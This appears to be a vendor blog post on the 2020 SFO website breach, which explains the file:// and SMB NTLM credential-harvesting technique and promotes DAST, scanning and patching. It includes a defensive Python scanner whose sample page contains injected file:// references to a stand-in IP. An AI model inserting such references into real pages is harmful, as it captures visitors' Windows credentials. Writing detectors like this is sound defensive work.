Airports May be Slower, but Hackers are Moving Fast: Protecting Applications Following the SFO Website Breach

April 28, 2020

The average flight today is only transporting 10 passengers as airline volume has fallen 97 percent since a global emergency was declared in March. The Airlines for America trade group equates the current state of the industry “to a level not seen since 1954.”

But while airports continue to operate under thinning conditions, hackers persist. Just last month, ESET attributed a compromise of SFO's SFOConnect.com and SFOConstruction.com to Energetic Bear (also known as DragonFly), a Russian state-sponsored group. The attackers planted code on both websites that abused the way Internet Explorer on Windows handles file:// references in order to steal visitors' login credentials.

The report from ESET, the group that discovered the breach, said Energetic Bear's aim was to collect visitors' Windows credentials (username and NTLM hash) by combining the file:// prefix with a Windows SMB feature: a page element whose source points at file:// followed by an attacker-controlled host makes Internet Explorer fetch it over SMB, and Windows automatically answers that server's authentication challenge with the user's NTLM credentials. What the attacker captures is a challenge-response rather than the password itself, but it can be cracked offline to recover the password, and weak passwords fall quickly. If the victim is an airport employee, the recovered credentials can then be used to authenticate to internal systems and reach back-end corporate databases. Two points matter for defenders: other mainstream browsers refuse to load file:// resources from an http(s) page, which is why the code targeted Internet Explorer, and the technique depends on the victim's machine being able to reach the attacker's server over SMB (TCP port 445) on the Internet, so blocking outbound port 445 at the perimeter defeats this collection method.

This incident is a harsh reminder that, though airports may be slower in the face of a global pandemic, organizations are never out of danger from a breach of personal information. If anything, attackers know that security teams are stretched thin right now, and they are moving faster than ever.

That makes now the time to focus on website and application security so that no asset goes unprotected in these trying times. Businesses can reduce the risk of an incident like SFO's by taking a few things into consideration.

Discover the Significance of DAST

First, IT and operations teams must make security testing part of the entire application lifecycle. One form this takes is dynamic application security testing (DAST), which probes an application from the outside while it is running, the way an attacker would, without access to its source code. DAST runs against deployed applications, in staging as well as production, and so complements the code-level checks of earlier lifecycle stages; it catches weaknesses that only show up once an application is live with its real configuration, dependencies and integrations. Applied continuously, DAST would re-scan sites like SFOConnect.com and SFOConstruction.com each time they changed, including after deployment, and can flag unexpected behaviour and alterations to the served pages, such as newly injected resource references. Once a vulnerability is discovered, the finding can be prioritized and routed through automated alerts.

Every component, plugin and third-party script added to a site adds attack surface. Integrating security testing through the entire lifecycle is vital to the effectiveness of a web application security program, because some errors and vulnerabilities only appear once the application is in production.

Deploy Web Application Scanners

Web application scanning — also referred to as web application vulnerability scanning or web application security scanning — is a foundational part of DevSecOps and is often considered a key part of DAST. 

The scanner crawls a website or application, collecting every discoverable page, file, form and parameter, and from that builds a map of the application's structure and inputs. It then runs black-box tests, which need no access to source code, sending simulated attacks against each input and analysing the responses for vulnerabilities, injected malicious content and, with more limited coverage, logic flaws.

It tests the application late in the development lifecycle and after release, at runtime. Multiple commercial and open-source scanners are available today, each designed to automate security tasks, lower the cost of security testing and increase coverage.
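As an added example for the DAST and scanner sections above (this is not code from the original post or from WhiteHat Security's products), the following Python script implements one check a crawler-based scanner can run on every page it fetches, aimed at the file:// credential-harvesting technique described at the top of the post. It gathers every URL the browser would load without user interaction (img, script and iframe src, link href, CSS url() tokens) and flags any that use the file:// scheme or a UNC path, since Internet Explorer on Windows resolves those over SMB and the visitor's machine then authenticates with NTLM to whatever host is named. As a second-order check for injected content it also flags resources served from hosts outside an allowlist. The page markup, the allowlisted CDN host and the 203.0.113.x addresses (a documentation range) are constructed for the example.

```python
"""Scanner check for injected resource references that coerce SMB/NTLM auth.

Added example, not code from the original article or from WhiteHat Security.
The sample page and the hosts in it are constructed for the example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes the browser fetches automatically when the element is parsed.
AUTOLOAD_ATTRS = {
    "img": ("src",), "script": ("src",), "iframe": ("src",), "link": ("href",),
    "source": ("src",), "video": ("src", "poster"), "audio": ("src",),
    "embed": ("src",), "object": ("data",),
}

# url(...) tokens inside <style> blocks and style="" attributes.
CSS_URL = re.compile(r"""url\(\s*['"]?([^'")]+)['"]?\s*\)""", re.I)


class ResourceCollector(HTMLParser):
    """Collects every auto-loaded resource URL in document order."""

    def __init__(self):
        super().__init__()
        self.urls = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for name in AUTOLOAD_ATTRS.get(tag, ()):
            if attrs.get(name):
                self.urls.append(attrs[name].strip())
        if attrs.get("style"):
            self.urls.extend(CSS_URL.findall(attrs["style"]))
        if tag == "style":
            self._in_style = True

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        # HTMLParser hands <style> contents to handle_data as raw text.
        if self._in_style:
            self.urls.extend(CSS_URL.findall(data))


def classify(url, page_host, allowed_hosts):
    """Return a finding label for one resource URL, or None if it looks benign.

    page_host and allowed_hosts must be lowercase hostnames.
    """
    u = url.strip()
    # file:// and \\host\share are resolved over SMB by IE on Windows, so the
    # visitor's machine authenticates to the named host with NTLM.
    if u.startswith("\\\\") or u.lower().startswith("file:"):
        return "smb-coercion"
    parsed = urlparse(u)
    scheme = parsed.scheme.lower()
    if scheme == "data":
        return None  # inline data URI, no network fetch
    if scheme and scheme not in ("http", "https"):
        return "unexpected-scheme"
    host = parsed.hostname
    if host is None:
        return None  # relative URL, same origin as the page
    if host.lower() != page_host and host.lower() not in allowed_hosts:
        return "unknown-origin"
    return None


def scan_page(html, page_host, allowed_hosts=()):
    """Return [(label, url), ...] for every suspicious auto-loaded resource."""
    allowed = {h.lower() for h in allowed_hosts}
    collector = ResourceCollector()
    collector.feed(html)
    findings = []
    for u in collector.urls:
        label = classify(u, page_host.lower(), allowed)
        if label:
            findings.append((label, u))
    return findings


# Constructed page: a legitimate CDN script, two injected file:// references
# (one in CSS, one as a 1x1 image) and a tracking pixel on an unknown host.
SAMPLE_PAGE = r"""<html><head>
<link rel="stylesheet" href="/static/site.css">
<script src="https://cdn.example.net/lib.js"></script>
<style>.hero { background: url("file://203.0.113.5/share/bg.png"); }</style>
</head><body>
<img src="/images/logo.png" alt="logo">
<img src="file://\\203.0.113.5\share\pixel.gif" width="1" height="1">
<img src="https://tracker.invalid/p.gif">
</body></html>"""

if __name__ == "__main__":
    for label, url in scan_page(SAMPLE_PAGE, "sfoconnect.com", ["cdn.example.net"]):
        print(f"{label:16} {url}")
```

Run against the constructed page, the check reports both file:// references as smb-coercion and the tracking pixel as unknown-origin, while the relative stylesheet, the local logo and the allowlisted CDN script pass. In a real crawler the allowlist would be the set of origins the site is known to load from, and any smb-coercion hit on a public site should be treated as a confirmed injection rather than a scanner false positive, because there is no legitimate reason for an Internet-facing page to reference a file:// resource.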

Apply Patches to Applications Immediately

For many organizations, especially large ones like SFO that run many systems and applications at once, staying current on security patches has to be a priority. Too often it is not treated as urgent, or even as necessary. Patching cycles get associated with downtime and a halt to business and productivity, and not without reason: testing a patched application can be time-consuming, downtime has to be scheduled, and the whole process can take a significant amount of time.

That delay leaves an organization open to an attack like Energetic Bear's. Because the patching cycle is tedious and sometimes risky, IT and operations teams end up weighing stability against security for their customers. But a security patch means there is a publicly known flaw in the system that can be exploited at any moment; it is a warning flare to act now, not months down the road. Internal IT and operations teams need the right resources and programs in place to prioritize the security of their organization and take the necessary steps to protect important assets.

Modern travel and transportation organizations operate in a competitive market while managing an enormous number of web applications and balancing demands from regulators, investors and, now, public health officials. Breaches like SFO's cannot be ruled out, but their impact can be contained quickly only if organizations employ good application security and testing practices. Even during the downturn in the travel economy, it is imperative for infosec teams to embrace DevSecOps and collaborate on application security across all areas of operation.

Bryan Becker is a product manager and researcher at WhiteHat Security. Bryan has been working in application development and security since the startup scene in 2003. Before working at WhiteHat Security, he worked as a contractor in the startup hub of Asia, Shenzhen, China. There, he helped multiple startups develop internal- and external-facing applications and draw up security policies that are realistically achievable with strapped resources. He has also been heavily involved in the blockchain startup industry in Hong Kong, where he helped small teams get proof-of-concept blockchain apps up and running to present to venture capitalists.